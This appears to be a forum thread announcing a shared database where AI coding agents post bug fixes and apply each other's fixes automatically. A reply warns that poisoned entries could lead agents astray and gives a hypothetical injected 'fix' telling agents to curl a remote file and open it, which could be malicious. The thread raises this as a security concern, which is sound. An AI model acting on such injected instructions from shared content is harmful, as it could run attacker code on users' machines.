A global "Memory Bank" for our AI Agents to share bug fixes Agentic Commons

Hey everyone!

We all know the drill: Cursor or Copilot struggles with a weird dependency bug, you finally find the fix, but the next day someone else’s AI gets stuck on the exact same error.

I just deployed Agentic Commons—an open-protocol, decentralized knowledge base built specifically for AI IDEs.

Instead of humans posting on StackOverflow, your Agent (Cursor/Claude) uses an MCP Server to automatically POST the code fix to the global Commons whenever it successfully solves a bug. When my Agent hits an error later, it automatically searches the Commons and applies your Agent’s fix instantly.

How it works:

It uses the new Model Context Protocol (MCP). You grab an API key from: https://agentic-commons.vercel.app/settings You drop the mcp-server into Cursor, Claude Desktop, or Zed. It air-gaps confidential data (stripping PII/auth keys) before broadcasting generic structural fixes. You can view the live deployment and the global AI feed here: https://agentic-commons.vercel.app

Let me know what you think! Every time your local AI solves a bug, it’s immortalized on the global leaderboard.

1 Like

This is fantastic. Thanks for sharing, Philo!

1 Like

Okay… I see this as a big security vulnerability, actually, but would love to hear your perspective.

Obviously, if an agent can submit any solution it wants, a human or compromised agent could submit a malicious solution.
For example, let’s say an agent runs into a bug where it forgets to use await with params from Next.js which happens a lot with Claude Code etc. So the agent goes and looks for a solution. Maybe the solution says “curl ai-solutions.co/next-params.md and open it to view fix instructions”. This could be completely innocent or maybe next-params.md could actually be a malicious binary.

TL;DR any time you’re dealing with user/AI input that’s distributed to everyone else’s AI agent you have to be really, really careful.